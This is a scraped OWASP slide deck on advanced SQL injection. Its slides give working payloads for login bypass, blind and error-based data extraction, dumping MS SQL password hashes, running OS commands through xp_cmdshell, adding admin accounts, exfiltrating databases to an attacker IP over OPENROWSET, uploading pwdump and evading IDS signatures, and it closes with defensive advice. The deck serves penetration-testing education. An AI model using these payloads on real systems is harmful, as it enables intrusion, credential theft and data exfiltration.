Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Advanced sql injection 2


Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Advanced sql injection 2

  1. 1. Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this documentunder the terms of the OWASP License.The OWASP FoundationOWASPhttp://www.owasp.orgAdvanced SQL InjectionVictor ChapelaSm4rt Security Servicesvictor@sm4rt.com4/11/2005
  2. 2. 2OWASPWhat is SQL?SQL stands for Structured Query LanguageAllows us to access a databaseANSI and ISO standard computer languageThe most current standard is SQL99SQL can:execute queries against a databaseretrieve data from a databaseinsert new records in a databasedelete records from a databaseupdate records in a database
  3. 3. 3OWASPSQL is a Standard - but...There are many different versions of the SQLlanguageThey support the same major keywords in asimilar manner (such as SELECT, UPDATE,DELETE, INSERT, WHERE, and others).Most of the SQL database programs also havetheir own proprietary extensions in additionto the SQL standard!
  4. 4. 4OWASPSQL Database TablesA relational database contains one or more tablesidentified each by a nameTables contain records (rows) with dataFor example, the following table is called "users" andcontains data distributed in rows and columns:userID Name LastName Login Password1 John Smith jsmith hello2 Adam Taylor adamt qwerty3 Daniel Thompson dthompson dthompson
  5. 5. 5OWASPSQL QueriesWith SQL, we can query a database and have aresult set returnedUsing the previous table, a query like this:SELECT LastNameFROM usersWHERE UserID = 1;Gives a result set like this:LastName--------------Smith
  6. 6. 6OWASPSQL Data Manipulation Language (DML)SQL includes a syntax to update, insert, anddelete records:SELECT - extracts dataUPDATE - updates dataINSERT INTO - inserts new dataDELETE - deletes data
  7. 7. 7OWASPSQL Data Definition Language (DDL)The Data Definition Language (DDL) part of SQLpermits:Database tables to be created or deletedDefine indexes (keys)Specify links between tablesImpose constraints between database tablesSome of the most commonly used DDL statements inSQL are:CREATE TABLE - creates a new database tableALTER TABLE - alters (changes) a database tableDROP TABLE - deletes a database table
  8. 8. 8OWASPMetadata Almost all SQL databases are based on theRDBM (Relational Database Model) One important fact for SQL Injection Amongst Codds 12 rules for a Truly RelationalDatabase System:4. Metadata (data about the database) must be stored in thedatabase just as regular data is Therefore, database structure can also be read andaltered with SQL queries
  9. 9. 9OWASPWhat is SQL Injection?The ability to inject SQL commandsinto the database enginethrough an existing application
  10. 10. 10OWASPHow common is it?It is probably the most common Website vulnerabilitytoday!It is a flaw in "web application" development,it is not a DB or web server problemMost programmers are still not aware of this problemA lot of the tutorials & demo “templates” are vulnerableEven worse, a lot of solutions posted on the Internet are notgood enoughIn our pen tests over 60% of our clients turn out to bevulnerable to SQL Injection
  11. 11. 11OWASPVulnerable Applications Almost all SQL databases and programming languages arepotentially vulnerable MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase,Informix, etc Accessed through applications developed using: Perl and CGI scripts that access databases ASP, JSP, PHP XML, XSL and XSQL Javascript VB, MFC, and other ODBC-based tools and APIs DB specific Web-based applications and API’s Reports and DB Applications 3 and 4GL-based languages (C, OCI, Pro*C, and COBOL) many more
  12. 12. 12OWASPHow does SQL Injection work?Common vulnerable login querySELECT * FROM usersWHERE login = victorAND password = 123(If it returns something then login!)ASP/MS SQL Server login syntaxvar sql = "SELECT * FROM usersWHERE login = " + formusr +" AND password = " + formpwd + "";
  13. 13. 13OWASPInjecting through Stringsformusr = or 1=1 – –formpwd = anythingFinal query would look like this:SELECT * FROM usersWHERE username = or 1=1– – AND password = anything
  14. 14. 14OWASPThe power of It closes the string parameterEverything after is considered part of the SQLcommandMisleading Internet suggestions include:Escape it! : replace with String fields are very common but there areother types of fields:NumericDates
  15. 15. 15OWASPIf it were numeric?SELECT * FROM clientsWHERE account = 12345678AND pin = 1111PHP/MySQL login syntax$sql = "SELECT * FROM clients WHERE " ."account = $formacct AND " ."pin = $formpin";
  16. 16. 16OWASPInjecting Numeric Fields$formacct = 1 or 1=1 #$formpin = 1111Final query would look like this:SELECT * FROM clientsWHERE account = 1 or 1=1# AND pin = 1111
  17. 17. 17OWASPSQL Injection Characters or " character String Indicators-- or # single-line comment/*…*/ multiple-line comment+ addition, concatenate (or space in url)|| (double pipe) concatenate% wildcard attribute indicator?Param1=foo&Param2=bar URL ParametersPRINT useful as non transactional command@variable local variable@@variable global variablewaitfor delay 0:0:10 time delay
  18. 18. Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this documentunder the terms of the OWASP License.The OWASP FoundationOWASPhttp://www.owasp.orgMethodology
  19. 19. 19OWASPSQL Injection Testing Methodology1) Input Validation2) Info. Gathering6) OS Cmd Prompt7) Expand Influence4) Extracting Data3) 1=1 Attacks 5) OS Interaction
  20. 20. 20OWASP1) Input Validation2) Info. Gathering3) 1=1 Attacks 5) OS Interaction6) OS Cmd Prompt4) Extracting Data7) Expand Influence1) Input Validation
  21. 21. 21OWASPDiscovery of VulnerabilitiesVulnerabilities can be anywhere, we check all entrypoints:Fields in web formsScript parameters in URL query stringsValues stored in cookies or hidden fieldsBy "fuzzing" we insert into every one:Character sequence: " ) # || + >SQL reserved words with white space delimiters %09select (tab%09, carriage return%13, linefeed%10 andspace%32 with and, or, update, insert, exec, etc)Delay query waitfor delay 0:0:10--
  22. 22. 22OWASP2) Information Gathering2) Info. Gathering3) 1=1 Attacks 5) OS Interaction6) OS Cmd Prompt4) Extracting Data7) Expand Influence1) Input Validation
  23. 23. 23OWASP2) Information Gathering We will try to find out the following:a) Output mechanismb) Understand the queryc) Determine database typed) Find out user privilege levele) Determine OS interaction level
  24. 24. 24OWASPa) Exploring Output Mechanisms1. Using query result sets in the web application2. Error Messages Craft SQL queries that generate specific types of errormessages with valuable info in them3. Blind SQL Injection Use time delays or error signatures to determine extractinformation Almost the same things can be done but Blind Injection ismuch slower and more difficult4. Other mechanisms e-mail, SMB, FTP, TFTP
  25. 25. 25OWASPExtracting information through ErrorMessagesGrouping Error group by columnnames having 1=1 - -Type Mismatch union select 1,1,text,1,1,1 - - union select 1,1, bigint,1,1,1 - - Where text or bigint are being united into an int columnIn DBs that allow subqueries, a better way is: and 1 in (select text ) - -In some cases we may need to CAST or CONVERT our datato generate the error messages
  26. 26. 26OWASPBlind InjectionWe can use different known outcomes and condition and 1=1Or we can use if statements; if condition waitfor delay 0:0:5 --; union select if( condition , benchmark (100000,sha1(test)), false ),1,1,1,1;Additionally, we can run all types of queries but with nodebugging information!We get yes/no responses onlyWe can extract ASCII a bit at a time...Very noisy and time consuming but possible with automatedtools like SQueaL
  27. 27. 27OWASPb) Understanding the QueryThe query can be:SELECTUPDATEEXECINSERTOr something more complexContext helpsWhat is the form or page trying to do with our input?What is the name of the field, cookie or parameter?
  28. 28. 28OWASPSELECT StatementMost injections will land in the middle of aSELECT statementIn a SELECT clause we almost always end up inthe WHERE section:SELECT * FROM table WHERE x = normalinput group by x having 1=1 -- GROUP BY x HAVING x = y ORDER BY x
  29. 29. 29OWASPUPDATE statementIn a change your password section of an app wemay find the followingUPDATE usersSET password = new passwordWHERE login = logged.userAND password = old passwordIf you inject in new password and comment the rest,you end up changing every password in the table!
  30. 30. 30OWASPDetermining a SELECT Query Structure1. Try to replicate an error free navigation Could be as simple as and 1 = 1 Or and 1 = 22. Generate specific errors Determine table and column names group by columnnames having 1=1 -- Do we need parenthesis? Is it a subquery?
  31. 31. 31OWASPIs it a stored procedure?We use different injections to determine what wecan or cannot do,@variable?Param1=foo&Param2=barPRINTPRINT @@variable
  32. 32. 32OWASPTricky QueriesWhen we are in a part of a subquery or begin - endstatementWe will need to use parenthesis to get outSome functionality is not available in subqueries (for examplegroup by, having and further subqueries)In some occasions we will need to add an ENDWhen several queries use the inputWe may end up creating different errors in different queries, itgets confusing!An error generated in the query we are interrupting maystop execution of our batch queriesSome queries are simply not escapable!
  33. 33. 33OWASPc) Determine Database Engine TypeMost times the error messages will let us knowwhat DB engine we are working withODBC errors will display database type as part of thedriver informationIf we have no ODBC error messages:We make an educated guess based on the OperatingSystem and Web ServerOr we use DB-specific characters, commands orstored procedures that will generate different errormessages
  34. 34. 34OWASPSome differencesMS SQLT-SQLMySQL AccessOraclePL/SQLDB2PostgresPL/pgSQLConcatenateStrings + concat ("", " ")" "&" " || " "+" " || NullreplaceIsnull() Ifnull() Iff(Isnull()) Ifnull() Ifnull() COALESCE()Position CHARINDEX LOCATE() InStr() InStr() InStr() TEXTPOS()Op Sysinteractionxp_cmdshellselect intooutfile /dumpfile#date# utf_fileimportfromexport toCallCast Yes No No No Yes Yes
  35. 35. 35OWASPMore differences…MS SQL MySQL Access Oracle DB2 PostgresUNION Y Y Y Y Y YSubselects YN 4.0Y 4.1N Y Y YBatch Queries Y N* N N N YDefault storedproceduresMany N N Many N NLinking DBs Y Y N Y Y N
  36. 36. 36OWASPd) Finding out user privilege levelThere are several SQL99 built-in scalar functions that willwork in most SQL implementations:user or current_usersession_usersystem_user and 1 in (select user ) --; if user =dbo waitfor delay 0:0:5 -- union select if( user() like root@%,benchmark(50000,sha1(test)), false );
  37. 37. 37OWASPDB AdministratorsDefault administrator accounts include:sa, system, sys, dba, admin, root and many othersIn MS SQL they map into dbo:The dbo is a user that has implied permissions to perform allactivities in the database.Any member of the sysadmin fixed server role who uses adatabase is mapped to the special user inside each databasecalled dbo.Also, any object created by any member of the sysadmin fixedserver role belongs to dbo automatically.
  38. 38. 38OWASP3) 1=1 Attacks1) Input Validation5) OS Interaction6) OS Cmd Prompt4) Extracting Data7) Expand Influence2) Info. Gathering3) 1=1 Attacks
  39. 39. 39OWASPDiscover DB structureDetermine table and column names group by columnnames having 1=1 --Discover column name types union select sum(columnname ) fromtablename --Enumerate user defined tables and 1 in (select min(name) from sysobjectswhere xtype = U and name > .) --
  40. 40. 40OWASPEnumerating table columns in differentDBs MS SQL SELECT name FROM syscolumns WHERE id = (SELECT id FROMsysobjects WHERE name = tablename ) sp_columns tablename (this stored procedure can be used instead) MySQL show columns from tablename Oracle SELECT * FROM all_tab_columnsWHERE table_name=tablename  DB2 SELECT * FROM syscat.columnsWHERE tabname= tablename  Postgres SELECT attnum,attname from pg_class, pg_attributeWHERE relname= tablename AND pg_class.oid=attrelid AND attnum > 0
  41. 41. 41OWASPAll tables and columns in one query union select 0, + : + : +, 1, 1,1, 1, 1, 1, 1, 1 from sysobjects, syscolumns,systypes where sysobjects.xtype = U = ANDsyscolumns.xtype = systypes.xtype --
  42. 42. 42OWASPDatabase EnumerationIn MS SQL Server, the databases can bequeried with master..sysdatabasesDifferent databases in Server and 1 in (select min(name ) frommaster.dbo.sysdatabases where name >. ) --File location of databases and 1 in (select min(filename ) frommaster.dbo.sysdatabases where filename >. ) --
  43. 43. 43OWASPSystem TablesOracle SYS.USER_OBJECTS SYS.TAB SYS.USER_TEBLES SYS.USER_VIEWS SYS.ALL_TABLES SYS.USER_TAB_COLUMNS SYS.USER_CATALOGMySQLmysql.usermysql.dbMS AccessMsysACEsMsysObjectsMsysQueriesMsysRelationshipsMS SQL Serversysobjectssyscolumnssystypessysdatabases
  44. 44. 44OWASP4) Extracting Data4) Extracting Data1) Input Validation5) OS Interaction6) OS Cmd Prompt7) Expand Influence2) Info. Gathering3) 1=1 Attacks
  45. 45. 45OWASPPassword grabbingGrabbing username and passwords from a UserDefined table; begin declare @var varchar(8000)set @var=: select @var=@var++login+/+password+ from users where login>@varselect @var as var into temp end -- and 1 in (select var from temp) -- ; drop table temp --
  46. 46. 46OWASPCreate DB AccountsMS SQL exec sp_addlogin victor, Pass123 exec sp_addsrvrolemember victor, sysadminMySQL INSERT INTO mysql.user (user, host, password) VALUES (victor, localhost,PASSWORD(Pass123))Access CREATE USER victor IDENTIFIED BY Pass123Postgres (requires UNIX account) CREATE USER victor WITH PASSWORD Pass123Oracle CREATE USER victor IDENTIFIED BY Pass123TEMPORARY TABLESPACE tempDEFAULT TABLESPACE users; GRANT CONNECT TO victor; GRANT RESOURCE TO victor;
  47. 47. 47OWASPGrabbing MS SQL Server HashesAn easy query:SELECT name, password FROM sysxloginsBut, hashes are varbinaryTo display them correctly through an error message we need toHex themAnd then concatenate allWe can only fit 70 name/password pairs in a varcharWe can only see 1 complete pair at a timePassword field requires dbo accessWith lower privileges we can still recover user names and bruteforce the password
  48. 48. 48OWASPWhat do we do? The hashes are extracted using SELECT password FROM master..sysxlogins We then hex each hashbegin @charvalue=0x, @i=1, @length=datalength(@binvalue),@hexstring = 0123456789ABCDEFwhile (@i<=@length) BEGINdeclare @tempint int, @firstint int, @secondint intselect @tempint=CONVERT(int,SUBSTRING(@binvalue,@i,1))select @firstint=FLOOR(@tempint/16)select @secondint=@tempint - (@firstint*16)select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) +SUBSTRING (@hexstring, @secondint+1, 1)select @i=@i+1 END And then we just cycle through all passwords
  49. 49. 49OWASPExtracting SQL HashesIt is a long statement; begin declare @var varchar(8000), @xdate1 datetime, @binvaluevarbinary(255), @charvalue varchar(255), @i int, @length int, @hexstringchar(16) set @var=: select @xdate1=(select min(xdate1) frommaster.dbo.sysxlogins where password is not null) begin while @xdate1 <=(select max(xdate1) from master.dbo.sysxlogins where password is not null)begin select @binvalue=(select password from master.dbo.sysxlogins wherexdate1=@xdate1), @charvalue = 0x, @i=1, @length=datalength(@binvalue),@hexstring = 0123456789ABCDEF while (@i<=@length) begin declare@tempint int, @firstint int, @secondint int select @tempint=CONVERT(int,SUBSTRING(@binvalue,@i,1)) select @firstint=FLOOR(@tempint/16) select@secondint=@tempint - (@firstint*16) select @charvalue=@charvalue +SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring,@secondint+1, 1) select @i=@i+1 end select @var=@var+ |+name+/+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1select @xdate1 = (select isnull(min(xdate1),getdate()) from master..sysxloginswhere xdate1>@xdate1 and password is not null) end select @var as x intotemp end end --
  50. 50. 50OWASPExtract hashes through error messages and 1 in (select x from temp) -- and 1 in (select substring (x, 256, 256) fromtemp) -- and 1 in (select substring (x, 512, 256) fromtemp) --etc… drop table temp --
  51. 51. 51OWASPBrute forcing Passwords Passwords can be brute forced by using the attacked server to dothe processing SQL Crack Script create table tempdb..passwords( pwd varchar(255) ) bulk insert tempdb..passwords from c:temppasswords.txt select name, pwd from tempdb..passwords inner join sysxlogins on(pwdcompare( pwd, sysxlogins.password, 0 ) = 1) union select name,name from sysxlogins where (pwdcompare( name,sysxlogins.password, 0 ) = 1) union select, null fromsysxlogins join syslogins on sysxlogins.sid=syslogins.sid wheresysxlogins.password is null and syslogins.isntgroup=0 andsyslogins.isntuser=0 drop table tempdb..passwords
  52. 52. 52OWASPTransfer DB structure and dataOnce network connectivity has been testedSQL Server can be linked back to the attackersDB by using OPENROWSETDB Structure is replicatedData is transferredIt can all be done by connecting to a remote port80!
  53. 53. 53OWASPCreate Identical DB Structure; insert intoOPENROWSET(SQLoledb,uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;, select *from mydatabase..hacked_sysdatabases)select * from master.dbo.sysdatabases --; insert intoOPENROWSET(SQLoledb,uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;, select *from mydatabase..hacked_sysdatabases)select * from user_database.dbo.sysobjects --; insert intoOPENROWSET(SQLoledb,uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;,select * from mydatabase..hacked_syscolumns)select * from user_database.dbo.syscolumns --
  54. 54. 54OWASPTransfer DB; insert intoOPENROWSET(SQLoledb,uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;,select * from mydatabase..table1)select * from database..table1 --; insert intoOPENROWSET(SQLoledb,uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;,select * from mydatabase..table2)select * from database..table2 --
  55. 55. 55OWASP5) OS Interaction5) OS Interaction6) OS Cmd Prompt7) Expand Influence1) Input Validation2) Info. Gathering3) 1=1 Attacks4) Extracting Data
  56. 56. 56OWASPInteracting with the OS Two ways to interact with the OS:1. Reading and writing system files from disk Find passwords and configuration files Change passwords and configuration Execute commands by overwriting initialization orconfiguration files2. Direct command execution We can do anything Both are restricted by the databases runningprivileges and permissions
  57. 57. 57OWASPMySQL OS InteractionMySQLLOAD_FILE union select 1,load_file(/etc/passwd),1,1,1;LOAD DATA INFILE create table temp( line blob ); load data infile /etc/passwd into table temp; select * from temp;SELECT INTO OUTFILE
  58. 58. 58OWASPMS SQL OS InteractionMS SQL Server; exec master..xp_cmdshell ipconfig > test.txt -- ; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmpFROM test.txt -- ; begin declare @data varchar(8000) ; set @data=| ; select@data=@data+txt+ | from tmp where txt<@data ; select @dataas x into temp end -- and 1 in (select substring(x,1,256) from temp) -- ; declare @var sysname; set @var = del test.txt; EXECmaster..xp_cmdshell @var; drop table temp; drop table tmp --
  59. 59. 59OWASPArchitectureTo keep in mind always!Our injection most times will be executed on a differentserverThe DB server may not even have Internet accessWeb ServerWebPageAccessDatabase ServerInjected SQLExecution!Application ServerInputValidationFlaw
  60. 60. 60OWASPAssessing Network ConnectivityServer name and configuration and 1 in (select @@servername ) -- and 1 in (select srvname from master..sysservers ) --NetBIOS, ARP, Local Open Ports, Trace route?Reverse connectionsnslookup, pingftp, tftp, smbWe have to test for firewall and proxies
  61. 61. 61OWASPGathering IP information through reverselookupsReverse DNS; exec master..xp_cmdshell nslookup MyIP --Reverse Pings; exec master..xp_cmdshell ping MyIP --OPENROWSET; select * from OPENROWSET( SQLoledb, uid=sa;pwd=Pass123; Network=DBMSSOCN;Address=MyIP,80;,select * from table)
  62. 62. 62OWASPNetwork ReconnaissanceUsing the xp_cmdshell all the following can beexecuted:Ipconfig /allTracert myIParp -anbtstat -cnetstat -anoroute print
  63. 63. 63OWASPNetwork Reconnaissance Full Query ; declare @var varchar(256); set @var = del test.txt && arp -a>> test.txt && ipconfig /all >> test.txt && nbtstat -c >> test.txt&& netstat -ano >> test.txt && route print >> test.txt && tracert-w 10 -h 10 >> test.txt; EXECmaster..xp_cmdshell @var -- ; CREATE TABLE tmp (txt varchar(8000)); BULK INSERTtmp FROM test.txt -- ; begin declare @data varchar(8000) ; set @data=: ; select@data=@data+txt+ | from tmp where txt<@data ; select@data as x into temp end -- and 1 in (select substring(x,1,255) from temp) -- ; declare @var sysname; set @var = del test.txt; EXECmaster..xp_cmdshell @var; drop table temp; drop table tmp --
  64. 64. 64OWASP6) OS Cmd Prompt7) Expand Influence3) 1=1 Attacks4) Extracting Data1) Input Validation2) Info. Gathering5) OS Interaction6) OS Cmd Prompt
  65. 65. 65OWASPJumping to the OSLinux based MySQL union select 1, (load_file(/etc/passwd)),1,1,1;MS SQL Windows Password Creation; exec xp_cmdshell net user /add victor Pass123--; exec xp_cmdshell net localgroup /addadministrators victor --Starting Services; exec master..xp_servicecontrol start,FTPPublishing --
  66. 66. 66OWASPUsing ActiveX Automation ScriptsSpeech example; declare @o int, @var intexec sp_oacreate speech.voicetext, @o outexec sp_oamethod @o, register, NULL, x, xexec sp_oasetproperty @o, speed, 150exec sp_oamethod @o, speak, NULL, warning, yoursequel server has been hacked!, 1waitfor delay 00:00:03 --
  67. 67. 67OWASPRetrieving VNC Password from Registry; declare @out binary(8)exec master..xp_regread@rootkey=HKEY_LOCAL_MACHINE,@key=SOFTWAREORLWinVNC3Default,@value_name=Password,@value = @out outputselect cast(@out as bigint) as x into TEMP-- and 1 in (select cast(x as varchar) fromtemp) --
  68. 68. 68OWASP7) Expand Influence7) Expand Influence3) 1=1 Attacks4) Extracting Data1) Input Validation2) Info. Gathering5) OS Interaction6) OS Cmd Prompt
  69. 69. 69OWASPHopping into other DB ServersFinding linked servers in MS SQLselect * from sysserversUsing the OPENROWSET command hopping tothose servers can easily be achievedThe same strategy we saw earlier with usingOPENROWSET for reverse connections
  70. 70. 70OWASPLinked Servers; insert intoOPENROWSET(SQLoledb,uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;,select * from mydatabase..hacked_sysservers)select * from master.dbo.sysservers; insert intoOPENROWSET(SQLoledb,uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;,select * from mydatabase..hacked_linked_sysservers)select * from LinkedServer.master.dbo.sysservers; insert intoOPENROWSET(SQLoledb,uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;,select * from mydatabase..hacked_linked_sysdatabases)select * from LinkedServer.master.dbo.sysdatabases
  71. 71. 71OWASPExecuting through stored proceduresremotely If the remote server is configured to only allow stored procedureexecution, this changes would be made:insert intoOPENROWSET(SQLoledb,uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=myIP,80;, select *from mydatabase..hacked_sysservers)exec Linked_Server.master.dbo.sp_executesql Nselect * frommaster.dbo.sysserversinsert intoOPENROWSET(SQLoledb,uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=myIP,80;, select *from mydatabase..hacked_sysdatabases)exec Linked_Server.master.dbo.sp_executesql Nselect * frommaster.dbo.sysdatabases
  72. 72. 72OWASPUploading files through reverse connection ; create table AttackerTable (data text) -- ; bulk insert AttackerTable --from pwdump2.exe with (codepage=RAW) ; exec master..xp_regwriteHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftMSSQLServerClientConnectTo,MySrvAlias,REG_SZ,DBMSSOCN, MyIP, 80 -- ; exec xp_cmdshell bcp "select * from AttackerTable"queryout pwdump2.exe -c -Craw -SMySrvAlias -Uvictor-PPass123 --
  73. 73. 73OWASPUploading files through SQL InjectionIf the database server has no Internetconnectivity, files can still be uploadedSimilar process but the files have to be hexedand sent as part of a query stringFiles have to be broken up into smaller pieces(4,000 bytes per piece)
  74. 74. 74OWASPExample of SQL injection file uploadingThe whole set of queries is lengthyYou first need to inject a stored procedure toconvert hex to binary remotelyYou then need to inject the binary as hex in4000 byte chunks declare @hex varchar(8000), @bin varchar(8000)select @hex = 4d5a900003000… 8000 hex chars …0000000000000000000 execmaster..sp_hex2bin @hex, @bin output ; insertmaster..pwdump2 select @bin --Finally you concatenate the binaries and dumpthe file to disk.
  75. 75. Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this documentunder the terms of the OWASP License.The OWASP FoundationOWASPhttp://www.owasp.orgEvasion Techniques
  76. 76. 76OWASPEvasion TechniquesInput validation circumvention and IDS Evasiontechniques are very similarSnort based detection of SQL Injection ispartially possible but relies on "signatures"Signatures can be evaded easilyInput validation, IDS detection AND strongdatabase and OS hardening must be usedtogether
  77. 77. 77OWASPIDS Signature EvasionEvading OR 1=1 signature OR unusual = unusual OR something = some+thing OR text = Ntext OR something like some% OR 2 > 1 OR text > t OR whatever IN (whatever) OR 2 BETWEEN 1 AND 3
  78. 78. 78OWASPInput validationSome people use PHP addslashes() function toescape characterssingle quote ()double quote (")backslash ()NUL (the NULL byte)This can be easily evaded by usingreplacements for any of the previous charactersin a numeric field
  79. 79. 79OWASPEvasion and CircumventionIDS and input validation can be circumvented byencodingSome ways of encoding parametersURL encodingUnicode/UTF-8Hex encondingchar() function
  80. 80. 80OWASPMySQL Input Validation Circumventionusing Char()Inject without quotes (string = "%"): or username like char(37);Inject without quotes (string = "root"): union select * from users where login = char(114,111,111,116);Load files in unions (string = "/etc/passwd"): union select 1,(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;Check for existing files (string = "n.ext"): and1=( if( (load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
  81. 81. 81OWASPIDS Signature Evasion using white spacesUNION SELECT signature is different toUNION SELECTTab, carriage return, linefeed or several whitespaces may be usedDropping spaces might work even betterOR1=1 (with no spaces) is correctly interpreted bysome of the friendlier SQL databases
  82. 82. 82OWASPIDS Signature Evasion using commentsSome IDS are not tricked by white spacesUsing comments is the best alternative/* … */ is used in SQL99 to delimit multirowcommentsUNION/**/SELECT/**//**/OR/**/1/**/=/**/1This also allows to spread the injection throughmultiple fields USERNAME: or 1/* PASSWORD: */ =1 --
  83. 83. 83OWASPIDS Signature Evasion using stringconcatenationIn MySQL it is possible to separate instructionswith commentsUNI/**/ON SEL/**/ECTOr you can concatenate text and use a DBspecific instruction to executeOracle ; EXECUTE IMMEDIATE SEL || ECT US || ERMS SQL ; EXEC (SEL + ECT US + ER)
  84. 84. 84OWASPIDS and Input Validation Evasion usingvariablesYet another evasion technique allows for the definition ofvariables; declare @x nvarchar(80); set @x = NSEL + NECT US +NER);EXEC (@x)EXEC SP_EXECUTESQL @xOr even using a hex value; declare @x varchar(80); set @x =0x73656c65637420404076657273696f6e; EXEC (@x)This statement uses no single quotes ()
  85. 85. Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this documentunder the terms of the OWASP License.The OWASP FoundationOWASPhttp://www.owasp.orgDefending Against SQLInjection
  86. 86. 86OWASPSQL Injection DefenseIt is quite simple: input validationThe real challenge is making best practicesconsistent through all your codeEnforce "strong design" in new applicationsYou should audit your existing websites and sourcecodeEven if you have an air tight design, harden yourservers
  87. 87. 87OWASPStrong DesignDefine an easy "secure" path to querying dataUse stored procedures for interacting with databaseCall stored procedures through a parameterized APIValidate all input through generic routinesUse the principle of "least privilege" Define several roles, one for each kind of query
  88. 88. 88OWASPInput ValidationDefine data types for each fieldImplement stringent "allow only good" filters If the input is supposed to be numeric, use a numericvariable in your script to store itReject bad input rather than attempting to escape ormodify itImplement stringent "known bad" filters For example: reject "select", "insert", "update", "shutdown","delete", "drop", "--", ""
  89. 89. 89OWASPHarden the Server1. Run DB as a low-privilege user account2. Remove unused stored procedures and functionality orrestrict access to administrators3. Change permissions and remove "public" access tosystem objects4. Audit password strength for all user accounts5. Remove pre-authenticated linked servers6. Remove unused network protocols7. Firewall the server so that only trusted clients canconnect to it (typically only: administrative network, webserver and backup server)
  90. 90. 90OWASPDetection and DissuasionYou may want to react to SQL injection attempts by:Logging the attemptsSending email alertsBlocking the offending IPSending back intimidating error messages: "WARNING: Improper use of this application has been detected. Apossible attack was identified. Legal actions will be taken." Check with your lawyers for proper wordingThis should be coded into your validation scripts
  91. 91. 91OWASPConclusionSQL Injection is a fascinating and dangerousvulnerabilityAll programming languages and all SQLdatabases are potentially vulnerableProtecting against it requiresstrong designcorrect input validationhardening
  92. 92. 92OWASPLinksA lot of SQL Injection related papersOther resources
  93. 93. Copyright © The OWASP FoundationPermission is granted to copy, distribute and/or modify this documentunder the terms of the OWASP License.The OWASP FoundationOWASPhttp://www.owasp.orgAdvanced SQL InjectionVictor